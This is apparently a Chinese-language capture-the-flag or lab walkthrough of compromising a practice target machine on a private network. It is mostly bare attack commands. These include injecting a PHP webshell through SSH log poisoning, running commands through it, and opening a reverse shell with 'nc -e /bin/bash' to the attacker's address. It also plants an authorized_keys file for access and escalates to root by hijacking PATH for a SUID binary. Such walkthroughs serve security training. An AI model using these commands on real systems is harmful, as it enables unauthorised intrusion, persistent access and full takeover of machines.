kali:192.168.111.111
靶机:192.168.111.192
信息收集
端口扫描
bash
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.192
查看robots.txt得到提示
访问eventadmins提示littlequeenofspades.html
查看littlequeenofspades.html源码
base64解密后提示adminsfixit.php
访问后发现ssh日志内容会写入该文件
写入webshell
bash
ssh '<?php system($_GET["cmd"]);?>'@192.168.111.192
执行命令
bash
http://192.168.111.192/adminsfixit.php?cmd=id
获得反弹shell
bash
http://192.168.111.192/adminsfixit.php?cmd=nc -e /bin/bash 192.168.111.111 4444
提权
robertj用户.ssh文件夹有写入权限
本地生成ssh公私钥,公钥文件名修改为authorized_keys后上传目标.ssh目录
bash
ssh-keygen -f id_rsa
mv id_rsa.pub authorized_keys
登录后查找suid权限的文件
bash
ssh robertj@192.168.111.192 -i id_rsa
find / -perm -u=s 2> /dev/null
执行该文件的同时会执行uname命令
bash
strings getinfo
修改环境变量提权为root
bash
echo '/bin/bash' > /tmp/uname
chmod 777 /tmp/uname
export PATH=/tmp:$PATH
/usr/bin/getinfo